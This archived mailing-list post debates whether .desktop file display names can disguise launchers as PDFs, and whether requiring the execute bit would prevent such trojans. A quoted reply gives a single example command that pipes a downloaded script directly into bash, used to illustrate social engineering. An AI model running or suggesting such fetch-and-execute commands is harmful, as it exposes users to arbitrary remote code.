"Name" key value in desk. entry spec collides with file names, could misguide users?
Jeffrey Vaughan
vaughan2 at seas.upenn.edu
Sun Mar 20 21:20:30 EET 2005
Diego Calleja wrote:
> El Sun, 20 Mar 2005 17:04:01 +0000,
> Mike Hearn <mike at navi.cx> escribió:
>
>>It is not, you just have to check the right boxes in the properties
>>window. Anybody can learn that. I don't agree that this would have any
>>benefit at all, not even psychological - fundamentally writing trojan
>>horses is not difficult and if you can convince somebody to click on an
>>icon you can convince them to copy/paste some meaningless command into
>>the "Run" dialog like:
>>
>> wget http://foo.org/bar.sh -q -O /dev/stdout | bash -
>>
>>which achieves the same effect.
>
>
> Downloading a file is very different from running a command. Many people won't fall so
> easily on that one (altough some - very few - people fell on the "write format C: trick"). Why,
> I don't really know. It probably has something to do with double clicking being a normal
> and trusted operation (the basis of their interaction with computers) and pasting
> weird commands being something unusual and obscure.
>
I often use the following work pattern:
1) Download 15ish academic papers with file names like: popl2003acm.pdf
or df3324r.pdf.
2) For each file in my firefox download directory that looks like a pdf
in the gui, double click on the paper.
3) Rename or delete the paper as appropriate.
Is there anyway to do this safely without either 1) requiring +x set on
.desktop files, 2) using the command line (real pita to switch between
the mouse for scrolling/zooming & the keyboard for opening pdfs) 3)
waiting n years for for selinux other other not-ready-yet technology?
If these are the only option I think we can dismiss 2 & 3. Let's set
that execute bit.
--Jeff
More information about the xdg
mailing list